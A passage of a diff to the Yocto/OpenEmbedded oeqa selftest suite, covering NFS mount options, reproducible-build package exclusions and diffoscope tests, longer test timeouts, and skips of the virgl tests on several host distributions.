diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
33 33
34 ptestsuite = "glibc-user" if ssh is None else "glibc" 34 ptestsuite = "glibc-user" if ssh is None else "glibc"
35 self.ptest_section(ptestsuite) 35 self.ptest_section(ptestsuite)
36 with open(os.path.join(builddir, "tests.sum"), "r") as f: 36 with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
37 for test, result in parse_values(f): 37 for test, result in parse_values(f):
38 self.ptest_result(ptestsuite, test, result) 38 self.ptest_result(ptestsuite, test, result)
39 39
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
41 with contextlib.ExitStack() as s: 41 with contextlib.ExitStack() as s:
42 # use the base work dir, as the nfs mount, since the recipe directory may not exist 42 # use the base work dir, as the nfs mount, since the recipe directory may not exist
43 tmpdir = get_bb_var("BASE_WORKDIR") 43 tmpdir = get_bb_var("BASE_WORKDIR")
44 nfsport, mountport = s.enter_context(unfs_server(tmpdir)) 44 nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
45 45
46 # build core-image-minimal with required packages 46 # build core-image-minimal with required packages
47 default_installed_packages = [ 47 default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
61 bitbake("core-image-minimal") 61 bitbake("core-image-minimal")
62 62
63 # start runqemu 63 # start runqemu
64 qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic")) 64 qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
65 65
66 # validate that SSH is working 66 # validate that SSH is working
67 status, _ = qemu.run("uname") 67 status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
70 # setup nfs mount 70 # setup nfs mount
71 if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0: 71 if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
72 raise Exception("Failed to setup NFS mount directory on target") 72 raise Exception("Failed to setup NFS mount directory on target")
73 mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir) 73 mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
74 status, output = qemu.run(mountcmd) 74 status, output = qemu.run(mountcmd)
75 if status != 0: 75 if status != 0:
76 raise Exception("Failed to setup NFS mount on target ({})".format(repr(output))) 76 raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 3119520f0d..59f80aad28 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
43 43
44 @classmethod 44 @classmethod
45 def tearDownClass(cls): 45 def tearDownClass(cls):
46 # Go creates file which are readonly
47 for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
48 for filename in filenames + dirnames:
49 f = os.path.join(dirpath, filename)
50 if not os.path.islink(f):
51 os.chmod(f, 0o775)
46 shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True) 52 shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
47 super(oeGoToolchainSelfTest, cls).tearDownClass() 53 super(oeGoToolchainSelfTest, cls).tearDownClass()
48 54
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
240 def test_no_busybox_base_utils(self): 240 def test_no_busybox_base_utils(self):
241 config = """ 241 config = """
242# Enable x11 242# Enable x11
243DISTRO_FEATURES_append += "x11" 243DISTRO_FEATURES_append = " x11"
244 244
245# Switch to systemd 245# Switch to systemd
246DISTRO_FEATURES += "systemd" 246DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
64 import bb 64 import bb
65 65
66 def testfunction(item, d): 66 def testfunction(item, d):
67 if item == "2" or item == "1": 67 if item == "2":
68 raise KeyError("Invalid number %s" % item) 68 raise KeyError("Invalid number %s" % item)
69 return "Found %s" % item 69 return "Found %s" % item
70 70
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
99 # Assert the function prints exceptions 99 # Assert the function prints exceptions
100 with captured_output() as (out, err): 100 with captured_output() as (out, err):
101 self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,)) 101 self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
102 self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
103 self.assertIn("KeyError: 'Invalid number 2'", out.getvalue()) 102 self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
diff --git a/meta/lib/oeqa/selftest/cases/oescripts.py b/meta/lib/oeqa/selftest/cases/oescripts.py
index 726daff7c6..fb99be447e 100644
--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
133 def check_endlines(self, results, expected_endlines): 133 def check_endlines(self, results, expected_endlines):
134 for line in results.output.splitlines(): 134 for line in results.output.splitlines():
135 for el in expected_endlines: 135 for el in expected_endlines:
136 if line.split() == el.split(): 136 if line and line.split()[0] == el.split()[0] and \
137 ' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
137 expected_endlines.remove(el) 138 expected_endlines.remove(el)
138 break 139 break
139 140
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 578b2b4dd9..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
75 exported_db_path = os.path.join(self.builddir, 'export.inc') 75 exported_db_path = os.path.join(self.builddir, 'export.inc')
76 export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True) 76 export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
77 self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output) 77 self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
78 self.assertTrue(os.path.exists(exported_db_path)) 78 self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
79 79
80 if replace_current_db: 80 if replace_current_db:
81 current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3') 81 current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
370 tempsrc = os.path.join(self.tempdir, 'srctree') 370 tempsrc = os.path.join(self.tempdir, 'srctree')
371 os.makedirs(tempsrc) 371 os.makedirs(tempsrc)
372 recipefile = os.path.join(self.tempdir, 'libmatchbox.bb') 372 recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
373 srcuri = 'git://git.yoctoproject.org/libmatchbox' 373 srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
374 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc]) 374 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
375 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) 375 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
376 checkvars = {} 376 checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
456 self.assertTrue(os.path.isfile(recipefile)) 456 self.assertTrue(os.path.isfile(recipefile))
457 checkvars = {} 457 checkvars = {}
458 checkvars['LICENSE'] = set(['Apache-2.0']) 458 checkvars['LICENSE'] = set(['Apache-2.0'])
459 checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https' 459 checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
460 inherits = ['setuptools3'] 460 inherits = ['setuptools3']
461 self._test_recipe_contents(recipefile, checkvars, inherits) 461 self._test_recipe_contents(recipefile, checkvars, inherits)
462 462
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
523 self.assertTrue(os.path.isfile(recipefile)) 523 self.assertTrue(os.path.isfile(recipefile))
524 checkvars = {} 524 checkvars = {}
525 checkvars['LICENSE'] = set(['GPLv2']) 525 checkvars['LICENSE'] = set(['GPLv2'])
526 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http' 526 checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
527 inherits = ['pkgconfig', 'autotools'] 527 inherits = ['pkgconfig', 'autotools']
528 self._test_recipe_contents(recipefile, checkvars, inherits) 528 self._test_recipe_contents(recipefile, checkvars, inherits)
529 529
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index d4800022df..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
17import os 17import os
18import datetime 18import datetime
19 19
20# For sample packages, see:
21# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
22# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
23# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
24# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
25# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
26# (both packages/ and packages-excluded/)
27exclude_packages = [
28 'acpica-src',
29 'babeltrace2-ptest',
30 'bind',
31 'bootchart2-doc',
32 'epiphany',
33 'gcr',
34 'glide',
35 'go-dep',
36 'go-helloworld',
37 'go-runtime',
38 'go_',
39 'gstreamer1.0-python',
40 'hwlatdetect',
41 'kernel-devsrc',
42 'libcap-ng',
43 'libjson',
44 'libproxy',
45 'lttng-tools-dbg',
46 'lttng-tools-ptest',
47 'ltp',
48 'ovmf-shell-efi',
49 'parted-ptest',
50 'perf',
51 'piglit',
52 'pybootchartgui',
53 'qemu',
54 'quilt-ptest',
55 'rsync',
56 'ruby',
57 'stress-ng',
58 'systemd-bootchart',
59 'systemtap',
60 'valgrind-ptest',
61 'webkitgtk',
62 ]
63
64def is_excluded(package):
65 package_name = os.path.basename(package)
66 for i in exclude_packages:
67 if package_name.startswith(i):
68 return i
69 return None
70
20MISSING = 'MISSING' 71MISSING = 'MISSING'
21DIFFERENT = 'DIFFERENT' 72DIFFERENT = 'DIFFERENT'
22SAME = 'SAME' 73SAME = 'SAME'
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
39 self.total = [] 90 self.total = []
40 self.missing = [] 91 self.missing = []
41 self.different = [] 92 self.different = []
93 self.different_excluded = []
42 self.same = [] 94 self.same = []
95 self.active_exclusions = set()
43 96
44 def add_result(self, r): 97 def add_result(self, r):
45 self.total.append(r) 98 self.total.append(r)
46 if r.status == MISSING: 99 if r.status == MISSING:
47 self.missing.append(r) 100 self.missing.append(r)
48 elif r.status == DIFFERENT: 101 elif r.status == DIFFERENT:
49 self.different.append(r) 102 exclusion = is_excluded(r.reference)
103 if exclusion:
104 self.different_excluded.append(r)
105 self.active_exclusions.add(exclusion)
106 else:
107 self.different.append(r)
50 else: 108 else:
51 self.same.append(r) 109 self.same.append(r)
52 110
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
54 self.total.sort() 112 self.total.sort()
55 self.missing.sort() 113 self.missing.sort()
56 self.different.sort() 114 self.different.sort()
115 self.different_excluded.sort()
57 self.same.sort() 116 self.same.sort()
58 117
59 def __str__(self): 118 def __str__(self):
60 return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total)) 119 return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
120
121 def unused_exclusions(self):
122 return sorted(set(exclude_packages) - self.active_exclusions)
61 123
62def compare_file(reference, test, diffutils_sysroot): 124def compare_file(reference, test, diffutils_sysroot):
63 result = CompareResult() 125 result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
68 result.status = MISSING 130 result.status = MISSING
69 return result 131 return result
70 132
71 r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True) 133 r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
72 134
73 if r.status: 135 if r.status:
74 result.status = DIFFERENT 136 result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
77 result.status = SAME 139 result.status = SAME
78 return result 140 return result
79 141
142def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
143 return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
144 **kwargs)
145
146class DiffoscopeTests(OESelftestTestCase):
147 diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
148
149 def test_diffoscope(self):
150 bitbake("diffoscope-native -c addto_recipe_sysroot")
151 diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
152
153 # Check that diffoscope doesn't return an error when the files compare
154 # the same (a general check that diffoscope is working)
155 with tempfile.TemporaryDirectory() as tmpdir:
156 run_diffoscope('A', 'A', tmpdir,
157 native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
158
159 # Check that diffoscope generates an index.html file when the files are
160 # different
161 with tempfile.TemporaryDirectory() as tmpdir:
162 r = run_diffoscope('A', 'B', tmpdir,
163 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
164
165 self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
166 self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
167
80class ReproducibleTests(OESelftestTestCase): 168class ReproducibleTests(OESelftestTestCase):
169 # Test the reproducibility of whatever is built between sstate_targets and targets
170
81 package_classes = ['deb', 'ipk'] 171 package_classes = ['deb', 'ipk']
82 images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline'] 172
173 # targets are the things we want to test the reproducibility of
174 targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
175 # sstate targets are things to pull from sstate to potentially cut build/debugging time
176 sstate_targets = []
83 save_results = False 177 save_results = False
84 if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ: 178 if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
85 save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT'] 179 save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
94 188
95 def setUpLocal(self): 189 def setUpLocal(self):
96 super().setUpLocal() 190 super().setUpLocal()
97 needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS'] 191 needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
98 bb_vars = get_bb_vars(needed_vars) 192 bb_vars = get_bb_vars(needed_vars)
99 for v in needed_vars: 193 for v in needed_vars:
100 setattr(self, v.lower(), bb_vars[v]) 194 setattr(self, v.lower(), bb_vars[v])
@@ -150,21 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
150 PACKAGE_CLASSES = "{package_classes}" 244 PACKAGE_CLASSES = "{package_classes}"
151 INHIBIT_PACKAGE_STRIP = "1" 245 INHIBIT_PACKAGE_STRIP = "1"
152 TMPDIR = "{tmpdir}" 246 TMPDIR = "{tmpdir}"
247 LICENSE_FLAGS_WHITELIST = "commercial"
248 DISTRO_FEATURES_append = ' systemd pam'
153 ''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes), 249 ''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
154 tmpdir=tmpdir) 250 tmpdir=tmpdir)
155 251
156 if not use_sstate: 252 if not use_sstate:
253 if self.sstate_targets:
254 self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
255 self.write_config(config)
256 bitbake(' '.join(self.sstate_targets))
257
157 # This config fragment will disable using shared and the sstate 258 # This config fragment will disable using shared and the sstate
158 # mirror, forcing a complete build from scratch 259 # mirror, forcing a complete build from scratch
159 config += textwrap.dedent('''\ 260 config += textwrap.dedent('''\
160 SSTATE_DIR = "${TMPDIR}/sstate" 261 SSTATE_DIR = "${TMPDIR}/sstate"
161 SSTATE_MIRRORS = "" 262 SSTATE_MIRRORS = "file://.*/.*-native.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
162 ''') 263 ''')
163 264
164 self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT')) 265 self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
165 self.write_config(config) 266 self.write_config(config)
166 d = get_bb_vars(capture_vars) 267 d = get_bb_vars(capture_vars)
167 bitbake(' '.join(self.images)) 268 # targets used to be called images
269 bitbake(' '.join(getattr(self, 'images', self.targets)))
168 return d 270 return d
169 271
170 def test_reproducible_builds(self): 272 def test_reproducible_builds(self):
@@ -212,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
212 314
213 self.write_package_list(package_class, 'missing', result.missing) 315 self.write_package_list(package_class, 'missing', result.missing)
214 self.write_package_list(package_class, 'different', result.different) 316 self.write_package_list(package_class, 'different', result.different)
317 self.write_package_list(package_class, 'different_excluded', result.different_excluded)
215 self.write_package_list(package_class, 'same', result.same) 318 self.write_package_list(package_class, 'same', result.same)
216 319
217 if self.save_results: 320 if self.save_results:
@@ -219,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
219 self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)])) 322 self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
220 self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)])) 323 self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
221 324
325 for d in result.different_excluded:
326 self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
327 self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
328
222 if result.missing or result.different: 329 if result.missing or result.different:
223 fails.append("The following %s packages are missing or different: %s" % 330 fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
224 (c, '\n'.join(r.test for r in (result.missing + result.different)))) 331 (c, '\n'.join(r.test for r in (result.missing + result.different))))
225 332
226 # Clean up empty directories 333 # Clean up empty directories
@@ -235,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
235 # Copy jquery to improve the diffoscope output usability 342 # Copy jquery to improve the diffoscope output usability
236 self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js')) 343 self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
237 344
238 runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'], 345 run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
239 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir) 346 native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
240 347
241 if fails: 348 if fails:
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
27 27
28 # The delta is intentionally smaller than the timeout, to detect cases where 28 # The delta is intentionally smaller than the timeout, to detect cases where
29 # we incorrectly apply the timeout more than once. 29 # we incorrectly apply the timeout more than once.
30 TIMEOUT = 5 30 TIMEOUT = 10
31 DELTA = 3 31 DELTA = 8
32 32
33 def test_result_okay(self): 33 def test_result_okay(self):
34 result = runCmd("true") 34 result = runCmd("true")
diff --git a/meta/lib/oeqa/selftest/cases/runqemu.py b/meta/lib/oeqa/selftest/cases/runqemu.py
index 7e676bcb41..da22f77b27 100644
--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
163 bitbake(cls.recipe) 163 bitbake(cls.recipe)
164 164
165 def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout): 165 def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
166 # Allow the runner's LoggingThread instance to exit without errors
167 # (such as the exception "Console connection closed unexpectedly")
168 # as qemu will disappear when we shut it down
169 qemu.runner.allowexit()
166 qemu.run_serial("shutdown -h now") 170 qemu.run_serial("shutdown -h now")
167 # Stop thread will stop the LoggingThread instance used for logging
168 # qemu through serial console, stop thread will prevent this code
169 # from facing exception (Console connection closed unexpectedly)
170 # when qemu was shutdown by the above shutdown command
171 qemu.runner.stop_thread()
172 time_track = 0 171 time_track = 0
173 try: 172 try:
174 while True: 173 while True:
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index 976b513727..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
14 14
15class TestExport(OESelftestTestCase): 15class TestExport(OESelftestTestCase):
16 16
17 @classmethod
18 def tearDownClass(cls):
19 runCmd("rm -rf /tmp/sdk")
20 super(TestExport, cls).tearDownClass()
21
22 def test_testexport_basic(self): 17 def test_testexport_basic(self):
23 """ 18 """
24 Summary: Check basic testexport functionality with only ping test enabled. 19 Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
95 msg = "Couldn't find SDK tarball: %s" % tarball_path 90 msg = "Couldn't find SDK tarball: %s" % tarball_path
96 self.assertEqual(os.path.isfile(tarball_path), True, msg) 91 self.assertEqual(os.path.isfile(tarball_path), True, msg)
97 92
98 # Extract SDK and run tar from SDK 93 with tempfile.TemporaryDirectory() as tmpdirname:
99 result = runCmd("%s -y -d /tmp/sdk" % tarball_path) 94 # Extract SDK and run tar from SDK
100 self.assertEqual(0, result.status, "Couldn't extract SDK") 95 result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
96 self.assertEqual(0, result.status, "Couldn't extract SDK")
101 97
102 env_script = result.output.split()[-1] 98 env_script = result.output.split()[-1]
103 result = runCmd(". %s; which tar" % env_script, shell=True) 99 result = runCmd(". %s; which tar" % env_script, shell=True)
104 self.assertEqual(0, result.status, "Couldn't setup SDK environment") 100 self.assertEqual(0, result.status, "Couldn't setup SDK environment")
105 is_sdk_tar = True if "/tmp/sdk" in result.output else False 101 is_sdk_tar = True if tmpdirname in result.output else False
106 self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment") 102 self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
107 103
108 tar_sdk = result.output 104 tar_sdk = result.output
109 result = runCmd("%s --version" % tar_sdk) 105 result = runCmd("%s --version" % tar_sdk)
110 self.assertEqual(0, result.status, "Couldn't run tar from SDK") 106 self.assertEqual(0, result.status, "Couldn't run tar from SDK")
111 107
112 108
113class TestImage(OESelftestTestCase): 109class TestImage(OESelftestTestCase):
@@ -179,12 +175,24 @@ class TestImage(OESelftestTestCase):
179 if "DISPLAY" not in os.environ: 175 if "DISPLAY" not in os.environ:
180 self.skipTest("virgl gtk test must be run inside a X session") 176 self.skipTest("virgl gtk test must be run inside a X session")
181 distro = oe.lsb.distro_identifier() 177 distro = oe.lsb.distro_identifier()
178 if distro and distro.startswith('almalinux'):
179 self.skipTest('virgl isn\'t working with Alma Linux')
180 if distro and distro.startswith('rocky'):
181 self.skipTest('virgl isn\'t working with Rocky Linux')
182 if distro and distro == 'debian-8': 182 if distro and distro == 'debian-8':
183 self.skipTest('virgl isn\'t working with Debian 8') 183 self.skipTest('virgl isn\'t working with Debian 8')
184 if distro and distro == 'centos-7': 184 if distro and distro == 'centos-7':
185 self.skipTest('virgl isn\'t working with Centos 7') 185 self.skipTest('virgl isn\'t working with Centos 7')
186 if distro and distro == 'centos-8':
187 self.skipTest('virgl isn\'t working with Centos 8')
188 if distro and distro.startswith('fedora'):
189 self.skipTest('virgl isn\'t working with Fedora')
186 if distro and distro == 'opensuseleap-15.0': 190 if distro and distro == 'opensuseleap-15.0':
187 self.skipTest('virgl isn\'t working with Opensuse 15.0') 191 self.skipTest('virgl isn\'t working with Opensuse 15.0')
192 if distro and distro == 'ubuntu-22.04':
193 self.skipTest('virgl isn\'t working with Ubuntu 22.04')
194 if distro and distro == 'ubuntu-22.10':
195 self.skipTest('virgl isn\'t working with Ubuntu 22.10')
188 196
189 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native') 197 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
190 sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native') 198 sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -220,6 +228,7 @@ class TestImage(OESelftestTestCase):
220 Author: Alexander Kanavin <alex.kanavin@gmail.com> 228 Author: Alexander Kanavin <alex.kanavin@gmail.com>
221 """ 229 """
222 import subprocess, os 230 import subprocess, os
231 self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
223 try: 232 try:
224 content = os.listdir("/dev/dri") 233 content = os.listdir("/dev/dri")
225 if len([i for i in content if i.startswith('render')]) == 0: 234 if len([i for i in content if i.startswith('render')]) == 0:
@@ -227,7 +236,7 @@ class TestImage(OESelftestTestCase):
227 except FileNotFoundError: 236 except FileNotFoundError:
228 self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.") 237 self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
229 try: 238 try:
230 dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True) 239 dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
231 except subprocess.CalledProcessError as e: 240 except subprocess.CalledProcessError as e:
232 self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.") 241 self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
233 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native') 242 qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
39 39
40 recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb') 40 recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
